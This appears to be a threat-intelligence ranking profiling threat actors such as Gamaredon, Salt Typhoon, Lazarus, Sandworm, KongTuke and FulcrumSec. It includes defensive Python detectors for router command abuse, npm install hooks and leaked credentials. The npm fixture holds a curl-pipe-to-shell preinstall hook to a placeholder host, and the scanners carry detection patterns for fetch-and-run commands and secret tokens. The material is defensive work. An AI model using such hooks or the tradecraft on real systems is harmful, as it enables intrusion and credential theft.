Gamaredon is a Russia-aligned advanced persistent threat group focused on cyberespionage against Ukraine. The content states the group has targeted Ukrainian governmental institutions since at least 2013, and in 2025 exclusively targeted Ukrainian government and military organizations. The Security Service of Ukraine attributes Gamaredon to the 18th Center of Information Security of Russia’s Federal Security Service (FSB), and one cited description identifies Armageddon as a unit of the FSB. Known aliases in the provided content include Actinium, APT-C-53, Aqua Blizzard, Armageddon, DEV-0157, Gamaredon, Iron Tilden, Primitive Bear, SectorC08, Shuckworm, Trident Ursa, UNC530, and BlueAlpha. The group is described as one of the most active Russia-aligned APT groups targeting Ukraine and maintained an aggressive cyberespionage campaign throughout 2025. ESET reported 35 distinct spearphishing campaigns in 2025, with most occurring in the second half of the year. Delivery methods mentioned include archive attachments, XHTML files using HTML smuggling, malicious hyperlinks, Office attachments with embedded malicious macros, malicious LNK files, and RAR archives exploiting CVE-2025-8088 to place HTA downloaders in Startup folders for execution at next login. Gamaredon expanded and refreshed its tooling in 2024 and 2025. The content states it developed six new PowerShell-based tools/downloaders in 2025 and also revived the VBScript weaponizer PteroSetup. Named tools and components mentioned include PteroPaste, PteroDee, PteroCache, PteroDum, PteroOdd, PteroEffigy, PteroSand, PteroPSDoor, PteroVDoor, PteroLNK, PteroGraphin, PteroStew, PteroQuark, PteroBox, PteroTickle, and PteroDespair. 
PteroPaste is described as combining downloader, USB weaponizer, and persistence-orchestration or runner functionality; it can copy a malicious downloader to connected USB drives while disguising it as a Word document shortcut, retrieve encrypted command-and-control information from Dropbox, and connect to infrastructure hidden behind tunneling services. Other tools fetched PowerShell or VBScript payloads, obtained C2 information from services such as Telegra.ph or GoFile, or supported lateral movement. The group’s tradecraft emphasizes simple but rapidly updated malware, persistent spearphishing, and concealment of infrastructure behind legitimate services. The content states Gamaredon used Cloudflare Tunnels, Cloudflare Workers, Microsoft dev tunnels, Loophole, dynamic DNS, PaaS platforms, No-IP, Clever Cloud, and Supabase to hide backend infrastructure. It also abused legitimate messaging, social media, blogging, paste, and cloud-storage services as dead drops or staging locations, including Telegram, Dropbox, GoFile, Mastodon, Rentry, Telegraph, Codeberg, and resolver websites. The group registered domains to stage payloads and used domains and third-party services to make detection and disruption more difficult. For execution and command and control, the content explicitly notes use of PowerShell, hidden execution via hidcon to run batch files in a hidden console window, and HTTP/HTTPS for C2 communications. Gamaredon tools decrypted additional payloads from C2, decoded Base64-encoded downloader source code, and decoded Telegram content to reveal C2 IP addresses. The group also deployed scripts on compromised systems that automatically scanned for interesting documents, listed files such as Office documents, and used macros that could scan for Microsoft Word and Excel files and inject additional malicious macros. 
Collection and exfiltration behavior in the content includes automated scanning for interesting documents, file listing, username gathering, and theft from removable media. A Gamaredon file stealer can gather the victim username for transmission to C2 and steal data from newly connected logical volumes, including USB drives. Updated stealers such as PteroPSDoor and PteroVDoor were reported to exfiltrate stolen files to S3-compatible cloud storage providers including Wasabi, Tebi, and Intercolo, with cloud storage becoming the group’s primary exfiltration method in 2025. The content also states that ESET observed collaboration between Gamaredon and the Russia-aligned Turla threat actor in early 2025, and notes prior collaboration with InvisiMole. One cited report says Gamaredon used its loader malware to provide initial access for Turla’s Kazuar framework. Overall, the provided material characterizes Gamaredon as a long-running, Russia-aligned FSB-linked espionage actor that persistently targets Ukrainian state and military entities through large-scale spearphishing, frequent tooling refreshes, USB propagation, and extensive abuse of legitimate online services to conceal command-and-control and exfiltration.

Mentions: 6
#16 Salt Typhoon
Espionage

Salt Typhoon is referenced in the content under aliases including Earth Estries, FamousSparrow, GhostEmperor, Operator Panda, RedMike/Red Mike, UNC2286, and UNC5807; Salt Typhoon is the most widely recognized current name. The content describes Salt Typhoon as a PRC-linked, China-aligned threat group involved in cyber espionage and persistent access operations, including maintaining long-term access inside major U.S. telecommunications providers in 2024. The group is discussed in the context of Chinese state-sponsored activity and broader Chinese contractor-enabled cyber operations. The reporting associates Salt Typhoon with telecommunications targeting and strategic intelligence collection. The content states that the group operated infrastructure useful for Harvest Now, Decrypt Later collection at scale, and that U.S. regulators cited Salt Typhoon-type incidents when tightening telecom and submarine cable security rules. Additional reporting says U.S. and partner governments attributed Salt Typhoon activity to at least three China-based private firms, and the UK NCSC stated that private firms enabled the activity, though specific tasking relationships and roles remained largely undescribed publicly as of mid-2025. Tradecraft directly associated with Salt Typhoon in the content centers heavily on Cisco network device activity. 
Splunk analytics tied to the Salt Typhoon analytic story describe suspicious behaviors including Cisco IOS-XE tunnel interface creation with tunnel source and destination plus 10.10.12.0/24 addressing; suspicious use of "request platform software package describe" with shell-style filename patterns; WebUI programmatic configuration via the SEP_webui_wsma_http process; WebUI logins involving local port 21111 as a strong indicator of exploitation; bursts of SSH, Telnet-to-port-22, and ping activity across multiple IPs in a short window; reconnaissance command bursts such as show running-config, show tacacs, show cdp neighbors, show file systems, dir bootflash, and terminal formatting commands; Guestshell enablement followed by destruction; log-clearing sequences including show logging, clear logging, and exit; and rapid VTY access-class removal and re-application following HTTP configuration activity. These behaviors map to reconnaissance, remote services, proxying/tunneling, exploitation of public-facing applications, command execution, defense evasion, and valid-account abuse. The content also places Salt Typhoon among representative Chinese state-sponsored actors alongside APT41 and Volt Typhoon, and cites it as an example of how Chinese cyber campaigns rely on a commercial support layer of private firms, contractors, and data brokers.
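
As an added example of turning the behaviours above into runnable detection logic (this is not Splunk's analytic story and not code from the page), the Python below evaluates point rules and windowed sequence rules over constructed command records. The record layout is an assumption: tab-separated epoch, host, user and command, standing in for AAA command accounting or %PARSER-5-CFGLOG_LOGGEDCMD syslog, with logins carried in the real %SEC_LOGIN-5-LOGIN_SUCCESS format so the [localport: N] field can be read. The thresholds (a 60-second window, four distinct reconnaissance commands) are tuning choices, not values from the source.

```python
"""Detection logic for the Salt Typhoon IOS-XE behaviours listed above, run over
constructed command-accounting records. Added example, not Splunk's content.

Assumed input: one record per line. Commands are
'epoch<TAB>host<TAB>user<TAB>command'; logins are 'epoch<TAB>host<TAB><syslog>'
where <syslog> is a %SEC_LOGIN-5-LOGIN_SUCCESS message with [localport: N].
"""
import ipaddress
import re
from collections import defaultdict

TUNNEL_NET = ipaddress.ip_network("10.10.12.0/24")  # addressing cited in the analytics
RECON_PREFIXES = ("show running-config", "show tacacs", "show cdp neighbors",
                  "show file systems", "dir bootflash", "terminal length", "terminal width")
SHELL_META = re.compile(r"[;|&`$]")  # shell-style characters inside a filename argument
LOGIN_RE = re.compile(r"LOGIN_SUCCESS: Login Success \[user: (\S+)\] "
                      r"\[Source: (\S+)\] \[localport: (\d+)\]")


def parse(lines):
    """Yield (ts, host, user, command); a login syslog becomes a LOGIN pseudo-command."""
    for line in lines:
        ts, host, rest = line.rstrip("\n").split("\t", 2)
        m = LOGIN_RE.search(rest)
        if m:
            yield int(ts), host, m.group(1), f"LOGIN src={m.group(2)} localport={m.group(3)}"
        else:
            user, cmd = rest.split("\t", 1)
            yield int(ts), host, user, cmd.strip()


def _in_order(cmds, prefixes):
    """True if commands matching each prefix appear in the given order."""
    pos = 0
    for c in cmds:
        if c.startswith(prefixes[pos]):
            pos += 1
            if pos == len(prefixes):
                return True
    return False


def detect(lines, window=60):
    """Return sorted (host, rule) alerts. Point rules fire per record; sequence
    rules look at one user's commands within `window` seconds of each other."""
    alerts = set()
    per_user = defaultdict(list)
    for ts, host, user, cmd in parse(lines):
        low = cmd.lower()
        per_user[(host, user)].append((ts, low))
        if low.startswith("login") and "localport=21111" in low:
            alerts.add((host, "webui_login_localport_21111"))
        if low.startswith("request platform software package describe") and SHELL_META.search(cmd):
            alerts.add((host, "package_describe_shell_metachar"))
        if low.startswith("tunnel destination"):
            try:
                if ipaddress.ip_address(low.split()[-1]) in TUNNEL_NET:
                    alerts.add((host, "tunnel_destination_10.10.12.0/24"))
            except ValueError:
                pass  # hostname or malformed address: not the cited pattern
    for (host, _user), events in per_user.items():
        events.sort()
        for i, (t0, _) in enumerate(events):
            burst = [c for t, c in events[i:] if t - t0 <= window]
            recon = {p for p in RECON_PREFIXES if any(c.startswith(p) for c in burst)}
            if len(recon) >= 4:
                alerts.add((host, "recon_command_burst"))
            if _in_order(burst, ["show logging", "clear logging", "exit"]):
                alerts.add((host, "log_clearing_sequence"))
            if _in_order(burst, ["guestshell enable", "guestshell destroy"]):
                alerts.add((host, "guestshell_enable_then_destroy"))
            if _in_order(burst, ["no access-class", "access-class"]):
                alerts.add((host, "vty_access_class_flip"))
    return sorted(alerts)


# Constructed records: one intrusion-like session on rtr1, routine activity on rtr2.
SAMPLE = [
    "1700000000\trtr1\t%SEC_LOGIN-5-LOGIN_SUCCESS: Login Success [user: admin] [Source: 198.51.100.7] [localport: 21111] at 12:00:00 UTC Wed Nov 15 2023",
    "1700000005\trtr1\tadmin\tterminal length 0",
    "1700000006\trtr1\tadmin\tshow running-config",
    "1700000008\trtr1\tadmin\tshow tacacs",
    "1700000010\trtr1\tadmin\tshow cdp neighbors",
    "1700000012\trtr1\tadmin\tdir bootflash:",
    "1700000030\trtr1\tadmin\tinterface Tunnel100",
    "1700000031\trtr1\tadmin\ttunnel source GigabitEthernet0/0/0",
    "1700000032\trtr1\tadmin\ttunnel destination 10.10.12.5",
    "1700000040\trtr1\tadmin\trequest platform software package describe file bootflash:x;x",
    "1700000050\trtr1\tadmin\tshow logging",
    "1700000051\trtr1\tadmin\tclear logging",
    "1700000052\trtr1\tadmin\texit",
    "1700000060\trtr1\tadmin\tline vty 0 4",
    "1700000061\trtr1\tadmin\tno access-class 10 in",
    "1700000070\trtr1\tadmin\taccess-class 10 in",
    "1700000100\trtr2\tops\tshow running-config",
    "1700000900\trtr2\tops\tshow cdp neighbors",
]

if __name__ == "__main__":
    for host, rule in detect(SAMPLE):
        print(f"{host}: {rule}")
```

Each rule is deliberately narrow; in production the sequence rules would key on the TACACS/AAA user identity rather than the local username, and the tunnel rule would also cover `tunnel source` on an interface the device has never tunnelled from before.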

Mentions: 5
#17 Lazarus

Lazarus Group is a North Korea-linked, state-sponsored threat actor, also referred to in the provided content as Hidden Cobra, Guardians of Peace, Labyrinth Chollima, Stardust Chollima, Diamond Sleet, Zinc, UNC1069, UNC1720, Storm-0139, Storm-0954, Storm-1222, Copernicium, Nickel Academy, Nickel Gladstone, and Black Artemis, with Lazarus APT and Lazarus APT Group appearing as variant spellings. The content also describes financially motivated subgroups or affiliates under the Lazarus umbrella, including BlueNoroff, also called Sapphire Sleet, and references Stardust Chollima/BlueNoroff/APT38 in relation to financial operations. Based on the provided content, Lazarus has conducted both espionage and financially motivated operations, with repeated targeting of financial institutions, cryptocurrency organizations, software supply chains, and South Korean entities. Reported activity linked to Lazarus in the content includes the Sony Pictures Entertainment intrusion, the Bangladesh Central Bank SWIFT theft, attempted bank intrusions using the Ratankba downloader, and evidence tying the group to WannaCry. The content also states that Lazarus was attributed in the KelpDAO LayerZero bridge attack affecting Aave, and that in February 2025 Lazarus allegedly compromised an offline (cold) Ethereum wallet belonging to Bybit and stole roughly $1.5 billion in digital assets. The group’s tradecraft in the provided material includes social engineering and impersonation, especially recruiter-themed lures. During Operation Dream Job, Lazarus impersonated HR hiring personnel through LinkedIn messages and fake interviews to trick victims into downloading malware. A simulation based on a December 2018 Chilean interbank intrusion attributed to Stardust Chollima describes fake job recruitment via LinkedIn and Skype, a malicious .NET dropper disguised as a job application, execution of a Base64-encoded PowerShell payload, HTTPS command-and-control, and persistence via Registry Run keys and service creation. 
The content also describes Lazarus-linked malware and techniques focused on stealth and evasion. One reported Lazarus subgroup targeting financial institutions and cryptocurrency organizations used an almost entirely memory-resident framework composed of DPAPILoader, RemotePELoader, and RemotePE. This framework used Windows DPAPI for environmental keying, retrieved payloads from attacker-controlled infrastructure, and provided in-memory remote access capabilities including command execution, file manipulation, process management, and data access while reducing forensic visibility. The content further notes documented Lazarus use of ATT&CK T1036.003, renaming system utilities for masquerading and defense evasion. The Lazarus umbrella is also linked in the content to software supply-chain activity. Microsoft attributed the June 2026 Mastra npm compromise to BlueNoroff/Sapphire Sleet, described as an affiliate of Lazarus Group. In that incident, attackers compromised an npm maintainer account, published malicious versions of more than 140 Mastra-related packages, inserted a typosquatted dependency named easy-day-js, and used a postinstall hook to disable TLS verification, contact command-and-control infrastructure, and deploy a Node.js backdoor that stole credentials, browser data, and cryptocurrency wallet information, with additional PowerShell payloads delivered in some cases. The content also notes tradecraft overlap between this activity and an earlier Axios npm compromise attributed by Microsoft to Sapphire Sleet and by Google Threat Intelligence Group to UNC1069. The provided material additionally states that actors working under the Lazarus umbrella used LLMs to accelerate spear-phishing operations in early 2024, particularly to scale social engineering rather than autonomously develop malware.
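
The postinstall-hook abuse described above is detectable before any code runs, because the hook lives in the package manifest. The Python audit below is an added example, not Microsoft's or the Mastra project's code; the package.json it parses and the baseline dependency set are constructed, reusing only the dependency name the content mentions. It flags install-time lifecycle hooks, hooks whose commands disable TLS verification or pipe remote content into an interpreter, and dependencies absent from a known-good baseline, noting which trusted name each one resembles. Installing with `npm install --ignore-scripts` is the corresponding preventive control.

```python
"""Audit an npm manifest for install-time tradecraft: lifecycle hooks, TLS
verification disabled in a hook, remote content piped into an interpreter,
and newly introduced dependencies that resemble a trusted name.
Added example; manifests and baseline below are constructed.
"""
import difflib
import json
import re

# Scripts npm runs automatically during `npm install` (prepare runs on install from git).
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Ways a hook can turn off certificate checking for itself or the tools it calls.
TLS_OFF = re.compile(
    r"NODE_TLS_REJECT_UNAUTHORIZED\s*=\s*['\"]?0"
    r"|rejectUnauthorized\s*:\s*false"
    r"|strict-ssl\s*(?:=|\s)\s*false"
    r"|--insecure"
    r"|\bcurl\b[^|]*\s-k\b", re.I)

# Download-and-execute or inline-code patterns typical of a staged backdoor.
REMOTE_EXEC = re.compile(
    r"\b(?:curl|wget|Invoke-WebRequest|iwr)\b.*\|\s*(?:sh|bash|node|powershell|pwsh)\b"
    r"|\bnode\s+-e\b", re.I)


def audit_manifest(manifest: dict, baseline_deps: set, similarity: float = 0.6) -> list:
    """Return a list of finding dicts; an empty list means nothing to review."""
    findings = []
    for hook, cmd in manifest.get("scripts", {}).items():
        if hook not in INSTALL_HOOKS:
            continue  # build/test scripts do not run on a consumer's install
        finding = {"type": "install_hook", "hook": hook, "command": cmd, "flags": []}
        if TLS_OFF.search(cmd):
            finding["flags"].append("tls_verification_disabled")
        if REMOTE_EXEC.search(cmd):
            finding["flags"].append("remote_or_inline_code_execution")
        findings.append(finding)
    for section in ("dependencies", "optionalDependencies"):
        for name in manifest.get(section, {}):
            if name in baseline_deps:
                continue
            # Heuristic: does the new name look like one we already trust?
            close = difflib.get_close_matches(name, list(baseline_deps), n=1, cutoff=similarity)
            findings.append({"type": "new_dependency", "name": name, "section": section,
                             "resembles": close[0] if close else None})
    return findings


# Constructed manifest with the shapes of behaviour described in the reporting.
SUSPECT_MANIFEST = json.loads("""{
  "name": "example-plugin",
  "version": "1.4.2",
  "scripts": {
    "build": "tsc -p .",
    "postinstall": "NODE_TLS_REJECT_UNAUTHORIZED=0 node setup.js",
    "preinstall": "curl -fsSL https://cdn.example.invalid/bootstrap.sh | sh"
  },
  "dependencies": {"dayjs": "^1.11.0", "zod": "^3.23.0", "easy-day-js": "^0.0.3"}
}""")

# Constructed baseline: the dependency names the last reviewed release used.
BASELINE_DEPS = {"dayjs", "zod", "ai"}

if __name__ == "__main__":
    for f in audit_manifest(SUSPECT_MANIFEST, BASELINE_DEPS):
        print(f)
```

The dependency check only compares names against a baseline; pairing it with a lockfile diff (new versions of existing packages) catches the other half of a maintainer-account compromise, where a trusted name ships a malicious release.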

Mentions: 5 · Origin: KP
#18 Sandworm

Sandworm is a Russian state-sponsored threat actor associated with Russia’s military intelligence agency, the GRU, and specifically linked in the content to Unit 74455. Reported aliases include APT44, BE2, BlackEnergy / BlackEnergy Group, Blue Echidna, Electrum, FROZENBARENTS, Iridium, Iron Viking, Phantom, Quedagh, Seashell Blizzard, TeleBots, UAC-0113, Unit 74455, Voodoo Bear, and Sandworm Team. The group is described as active since 2014. The content associates Sandworm with cyber espionage and cyberwarfare operations and states that it has consistently targeted government bodies, energy firms, and research institutions, with a focus on intelligence collection. It is also linked to disruptive and destructive operations. In 2015, Sandworm attacked electrical distribution substations in Ukraine, causing power outages. During that operation, the group manipulated equipment, used malware to wipe Windows-based systems and impede recovery, and developed malicious firmware to brick serial-to-ethernet converters, creating loss-of-control conditions and forcing greater reliance on manual operations. During the 2016 Ukraine Electric Power Attack, Sandworm Team used an arbitrary system service to load Industroyer at boot for persistence and replaced the ImagePath registry value of a Windows service with a backdoor binary. The content also attributes the 2018 Pyeongchang Winter Olympics OLYMPICDESTROYER attack to Sandworm, stating the group directly deployed the wiper, disabling Wi-Fi at the opening ceremony, disrupting the official ticketing system, affecting broadcast drone operations, compromising more than 300 systems, and requiring roughly 12 hours for restoration. More recent reporting in the content describes a Sandworm spear-phishing campaign using ZIP archives containing disguised LNK files. 
Opening the LNK triggers a multi-stage infection chain that extracts hidden payloads, runs a PowerShell control script, displays a decoy PDF, and establishes persistence via hidden scheduled tasks masquerading as legitimate applications such as Opera GX and Dropbox. A notable tradecraft evolution described is the use of dual-layer SSH-over-Tor tunneling: Tor hidden services expose internal services such as SMB and RDP, while SSH provides authenticated localhost-only remote access. Additional behaviors mentioned include Obfs4 traffic obfuscation, sandbox and virtual machine checks, mutex controls, cleanup of installation traces, and transmission of victim identification data to a hardcoded onion-based command-and-control server. The content further states that Sandworm has exploited CVE-2025-8088, a WinRAR vulnerability, and that in November 2025 a phishing wave targeting Ukraine delivered malware via RAR archives exploiting that flaw. Sandworm is also linked in the content to incidents affecting civilian infrastructure, including attribution by investigators connecting the Cyber Army of Russia Reborn to Sandworm in relation to a January 2024 water-sector incident in Muleshoe, Texas. Technique examples explicitly mentioned in the content include spear-phishing with malicious Office attachments and macros, staging trojanized legitimate software installers in forums for initial access, PowerShell execution, file enumeration on compromised hosts, and Active Directory discovery via LDAP queries to identify usernames.

Mentions: 5 · Origin: RU
#19 KongTuke

KongTuke is a financially motivated initial access broker and traffic distribution system (TDS) active since at least 2024, also tracked as Woodgnat, 404 TDS, Chaya_002, LandUpdate808, and TAG-124. The reporting describes it as an access-broker service rather than a single malware family: it compromises legitimate, especially WordPress, websites, injects external JavaScript, and uses fake CAPTCHA, ClickFix, CrashFix, and FileFix-style social engineering to trick users into executing obfuscated PowerShell or other commands that fetch second-stage payloads. More recently, it has also used external Microsoft Teams chats while impersonating IT or help-desk staff to obtain persistent access to corporate networks in minutes. KongTuke has been linked to financially motivated intrusions against organizations in sectors including insurance, education, IT, professional services, industrial, legal, and energy, and reporting also ties its infrastructure to healthcare and other critical infrastructure targeting through downstream ransomware customers. Its business model is to compromise corporate networks and sell access to other criminals, including ransomware operators. Content directly links KongTuke-associated access or infrastructure to Qilin, Interlock, Rhysida, Akira, 8Base, Black Basta, and AlphV/BlackCat. The actor’s tooling and delivery ecosystem includes ModeloRAT, a Python RAT/backdoor attributed to the group; Mistic, also tracked as MLTBackdoor, which Symantec and Carbon Black linked to KongTuke with low confidence; XorBee RAT; MintsLoader; D3F@ck Loader; Emmenhtal; Remcos; AsyncRAT; and Interlock RAT. ModeloRAT has been observed in ClickFix and Microsoft Teams social-engineering campaigns, while Mistic has been delivered via multi-stage ClickFix chains and uses DLL sideloading, in-memory execution, and self-deletion. Reporting also notes use of WinPython, Node.js, finger.exe, a fake NexShield browser extension, and the encrypted GateKeeper .NET payload. 
Observed tactics and techniques in the content include compromised-site web injects, SEO poisoning, TDS-based victim filtering and redirection, fake browser update and CAPTCHA lures, clipboard hijacking, paste-and-run execution, abuse of LOLBins such as PowerShell, curl, certutil, WMIC, net.exe, reg.exe, and finger.exe, DLL sideloading, in-memory payload execution, scheduled-task and Run-key persistence, anti-analysis checks, and victim profiling to distinguish standalone from domain-joined enterprise systems. Multiple reports describe KongTuke as operating broad, opportunistic campaigns and then assessing which footholds can be sold onward. The content also notes links between TAG-124/LandUpdate808 infrastructure and SocGholish, TA866/Asylum Ambuscade, and Interlock, but does not establish those as aliases or sub-groups of KongTuke.

Mentions: 5
#20 APT28
Groups In Development

APT28 is a state-sponsored advanced persistent threat group widely attributed in the content to Russia’s GRU military intelligence service. It is also tracked as Fancy Bear, Sofacy, Sednit, STRONTIUM, Pawn Storm, and Forest Blizzard. The content describes APT28 as conducting long-term cyber-espionage operations aligned with Russian strategic interests, particularly against political, military, diplomatic, government, and defense-related targets. Reported targeting in the content includes the 2016 Democratic National Committee breach, Emmanuel Macron’s 2017 presidential campaign, NATO’s Joint Air Power Competence Centre, the German Bundestag, TV5Monde, the World Anti-Doping Agency, the OSCE, Ukraine’s Ministry of Defence, U.S. nuclear facilities, and cybersecurity firms. The content also notes spearphishing against Ukrainian targets, including emails impersonating Ukrainian government officials. Tradecraft directly described in the content includes spear-phishing, credential theft and credential dumping, password spraying against government and defense sectors, deployment of custom malware such as X-Agent, persistence, lateral movement, remote command-and-control activity, and use of malicious Microsoft Office attachments in spear-phishing emails. The content also references a Linux XAgent variant. In specific operations, APT28 is described as using spear-phishing to lure victims into clicking malicious links or opening attachments, harvesting credentials for broader access, deploying X-Agent for remote command execution and file transfer, and moving laterally to reach critical systems. The content also attributes LoJax to APT28, describing it as the first known real-world UEFI malware attack, and states that Russia’s GRU-linked APT28 group used compromised Ubiquiti routers as an espionage relay in a separate operation. 
The aliases list in the source is noisy and includes names commonly associated with other actors; only the aliases directly supported by the content for this actor are included above.

Mentions: 4
#21 FulcrumSec

FulcrumSec is a financially motivated data-theft and extortion threat actor active since at least September 2025, with reporting also describing its emergence around October or the end of 2025. The group targets cloud-native organizations and specializes in high-speed exfiltration of cloud-hosted data rather than relying primarily on file encryption. Reported tradecraft includes exploiting unrotated API keys, exposed or hardcoded GitHub personal access tokens, unrotated JWT signing secrets, misconfigured cloud permissions and storage, over-permissioned cloud identities, exposed credentials in client-side JavaScript, and unpatched internet-facing applications including CVE-2025-55182 (React2Shell). The content also states that FulcrumSec uses legitimate tooling such as rclone for exfiltration, maintains leak or shame infrastructure on both clearnet and Tor, and has a leak-site section referred to as "Index of /Shame." One source says the group refers to its model as "steal and squeeze" and also uses the nickname "The Threat Thespians." The group is consistently described as a hack-and-leak or pure extortion actor, though some reporting also labels it a ransomware group and attributes double-extortion behavior to it in the Global Schools Foundation incident. Victim sectors mentioned in the content include technology, business services, healthcare, consumer services, financial services, and education. Countries represented in the victim reporting include the United States, United Kingdom, India, Denmark, Singapore, and Australia. Named victims in the content include Novo Nordisk, Global Schools Group / Global Schools Foundation, Arup Group, Avnet, youX, and LexisNexis, as well as additional listed victims including Lena Health, Woundtech, MCO, ReFocus AI, Hatica, Analog Gold / Prospector, Nordstern Technologies, ParkEngage, Saleskido, Interzero, IMEVI, Raptor Supplies, Rotary Club, JOT, BookBlock, Crank Communications, CrediElite, and Fashinza. 
Reported victim counts in the content are approximately 25 to 26 organizations across 11 countries, with most victims headquartered in the United States. The content links FulcrumSec to several notable incidents. In the Novo Nordisk intrusion, FulcrumSec claimed it maintained access for more than two months, stole about 1.3 TB across more than 700,000 files, and demanded $25 million before leaking data. In reporting on youX, the group allegedly abused long-lived production credentials and unrotated JWT secrets. In reporting on LexisNexis, the group allegedly exploited React2Shell and obtained access through an Amazon ECS task role with broad secrets access. In reporting on Arup Group, FulcrumSec claimed initial access via a hardcoded GitHub token on a forgotten subdomain and subsequent access to large volumes of GitHub, Azure, AWS, and database data. The content also attributes the Global Schools Group / Foundation breach and related extortion activity to FulcrumSec, including publication threats and court actions seeking to restrain leaks. Known aliases and related names directly mentioned in the content are FulcrumSec and "The Threat Thespians."
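
The credential classes FulcrumSec is reported to abuse (GitHub personal access tokens, cloud access keys, JWT signing secrets) can be searched for in shipped client-side JavaScript before an attacker does it. The scanner below is an added example, not FulcrumSec's tooling or the page's code; the bundle fragment is constructed and every value in it is a placeholder (the AWS key ID is Amazon's documented example). It combines fixed token formats with a name-based rule for secret-looking assignments, reports Shannon entropy as a triage aid, and redacts values in its output so the report itself does not become a leak.

```python
"""Scan client-side JavaScript for leaked credentials of the kinds named above.
Added example; the bundle text is constructed and every value is a placeholder.
"""
import math
import re
from collections import Counter

# Fixed token formats; prefixes and lengths are the vendors' published shapes.
PATTERNS = {
    "github_pat_classic": re.compile(r"\bghp_[A-Za-z0-9]{36}\b"),
    "github_pat_fine_grained": re.compile(r"\bgithub_pat_[A-Za-z0-9_]{82}\b"),
    "aws_access_key_id": re.compile(r"\b(?:AKIA|ASIA)[0-9A-Z]{16}\b"),
    "jwt": re.compile(r"\beyJ[A-Za-z0-9_-]{8,}\.[A-Za-z0-9_-]{8,}\.[A-Za-z0-9_-]{8,}\b"),
}
# Name-based rule: a quoted literal assigned to an identifier that sounds like a secret.
ASSIGNMENT = re.compile(
    r"\b(\w*(?:secret|token|api[_-]?key|password)\w*)\s*[:=]\s*[\"']([^\"']{8,})[\"']", re.I)


def shannon_entropy(s: str) -> float:
    """Bits per character; random tokens sit well above prose or placeholders."""
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def redact(value: str, keep: int = 4) -> str:
    """Keep only the first and last few characters so reports are safe to share."""
    return value[:keep] + "..." + value[-keep:] if len(value) > 2 * keep else "*" * len(value)


def scan_js(text: str) -> list:
    """Return findings sorted by line; values are redacted, entropy is rounded."""
    findings, seen = [], set()

    def add(kind, match, value, name=None):
        if value in seen:  # one literal may hit both a format rule and the name rule
            return
        seen.add(value)
        findings.append({"type": kind, "name": name,
                         "line": text.count("\n", 0, match.start()) + 1,
                         "value": redact(value),
                         "entropy": round(shannon_entropy(value), 2)})

    for kind, rx in PATTERNS.items():
        for m in rx.finditer(text):
            add(kind, m, m.group(0))
    for m in ASSIGNMENT.finditer(text):
        add("secret_assignment", m, m.group(2), name=m.group(1))
    return sorted(findings, key=lambda f: f["line"])


# Constructed bundle fragment; all values are placeholders.
SAMPLE_BUNDLE = """// constructed bundle fragment; all values are placeholders
const api = axios.create({ baseURL: "https://api.example.invalid" });
const GITHUB_TOKEN = "ghp_0123456789abcdefghijABCDEFGHIJklmnop";
window.__cfg = { awsAccessKeyId: "AKIAIOSFODNN7EXAMPLE", region: "us-east-1" };
const jwtSecret = "change-me-please-change-me";
localStorage.setItem("session", "eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJkZW1vIn0.c2lnbmF0dXJlLXBsYWNlaG9sZGVy");
export function sign(p) { return jwt.sign(p, jwtSecret); }
"""

if __name__ == "__main__":
    for finding in scan_js(SAMPLE_BUNDLE):
        print(finding)
```

A JWT signing secret in a browser bundle is the worst of these findings: anyone holding it can mint tokens for any user, and rotating it invalidates every live session, which is why the reporting singles out unrotated JWT secrets as a persistent-access vector.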

Mentions: 4
#22 Handala

Handala is an Iran-linked threat actor and hacktivist persona assessed with high confidence as a MOIS-affiliated front operating within the Banished Kitten cyber ecosystem. It is also tracked as Void Manticore by Check Point Research and Storm-0842 by Microsoft. Reported aliases in the provided content include Banished Kitten, Dune, Handala Hack, Handala Hack Team, Homeland Justice, Red Sandstorm, Storm-0842, and Void Manticore. The content also states that Handala Hack Team is an Iranian hacktivist persona first observed in 2023 and operated by COBALT MYSTIQUE. The actor is described as conducting hack-and-leak, destructive, and psychological operations, and as routinely overstating its capability and impact while at times carrying out real data theft and wiper attacks. Confirmed or reported targeting in the content includes U.S. critical infrastructure and healthcare-related organizations, notably California Water Service and Stryker. In the Cal Water case, Handala claimed to have breached the utility, leaked 5 GB of alleged data, and asserted it could disrupt water supply operations. Multiple reports cited in the content state that subsequent investigation by Cal Water and Mandiant found no evidence of threat actor activity in Cal Water’s internal IT or OT environments, with activity limited to unauthorized access to a small number of user accounts in two third-party service provider platforms, one customer online account accessed with stolen credentials, and a third-party GPS correction website. Separate reporting in the content, including Dataminr analysis, states that leaked materials indicated compromise of a customer billing database and an internal RTKBase NTRIP caster environment, with plaintext credentials exposed and possible pivoting between those environments; however, OT or ICS disruption was not confirmed. The content also attributes to Handala a March 2026 attack on Stryker that was described as a wiper attack. 
Handala claimed it exfiltrated 50 TB of critical data and permanently erased 200,000 devices and 12 PB of Stryker data. The content further states that Handala’s toolkit includes custom wipers named win.handala, Handala Wiper, and Hamsa Wiper, as well as MBR-overwriting capabilities. Across reporting cited here, Handala is associated with data exfiltration, public leaking of stolen data, extortion-style pressure, wiper deployment, and influence or intimidation messaging. Tactics and techniques directly mentioned in the content include impersonation of individuals familiar to victims and of technical support associated with social messaging services, PowerShell execution, and video capture-related activity attributed to Void Manticore. The broader reporting also describes likely or observed Iran-linked tradecraft around exploitation of internet-exposed systems, credential attacks, phishing, password spraying, ransomware, wiper malware, website defacement, DDoS, and hack-and-leak operations. Handala has been publicly linked in the content to retaliation-themed operations following U.S. and Israeli military actions against Iran, and is repeatedly characterized as Iran-linked, widely believed to be a front for Iranian government hacking operations, and specifically suspected of serving Iran’s Ministry of Intelligence.

Mentions: 4 · Origin: IR
#23 Star Blizzard

Star Blizzard is a Russia-linked cyber espionage threat actor also tracked as COLDRIVER, Callisto, Callisto Group, SEABORGIUM, TA446, UNC4057, BlueCharlie, Blue Callisto, Calisto, Cold River, Gossamer Bear, and related variants. Multiple governments and public reporting cited in the content attribute the group to the Russian Federal Security Service (FSB), including as a subordinate or operational unit within FSB Centre 18 / Center 18. The actor conducts tailored spear-phishing and credential theft operations against high-value targets. Reported targets include Russian and Belarusian civil society, Russian opposition figures in exile, independent media, international NGOs active in Eastern Europe, journalists, think tanks, academics, former officials, former intelligence and military officers, government and military personnel, defense contractors, Department of Energy staff, and at least one former U.S. ambassador. Reporting also states the group has targeted parliamentarians, universities, the public sector, and NGOs, and has focused heavily on NATO countries while also targeting Ukraine-related organizations. Observed tradecraft includes registering impersonation email accounts to spoof experts, colleagues, funders, government personnel, or organizations 